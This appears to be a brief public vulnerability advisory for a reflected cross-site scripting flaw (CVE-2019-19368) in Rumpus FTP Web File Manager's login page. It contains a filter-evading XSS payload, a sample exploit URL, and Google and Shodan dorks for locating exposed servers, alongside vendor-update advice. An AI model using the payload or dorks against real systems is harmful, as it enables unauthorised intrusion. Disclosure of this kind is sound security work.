Share
# Exploit Title: Rumpus FTP Web File Manager 8.2.9.1 - Reflected Cross-Site Scripting  
# Google Dork: site:*.*.com "Web File Manager" inurl:?login=  
# Shodan Dork: Server: Rumpus  
# Date: 2019-12-14  
# Exploit Author: Harshit Shukla, Sudeepto Roy  
# Vendor Homepage: https://www.maxum.com/  
# Tested On: Windows & Mac  
# Version: 8.2.9.1  
# CVE: CVE-2019-19368  
  
Description:   
A reflected XSS was identified on the Login page of RUMPUS FTP Web File Manager.  
  
PoC:  
  
Payload: ?!'><sVg/OnLoAD=alert`1`//  
  
Vulnerable URL:  
http://127.0.0.1/Login?!'><sVg/OnLoAD=alert`1`//  
  
Solution:  
Update to the latest version released by vendor.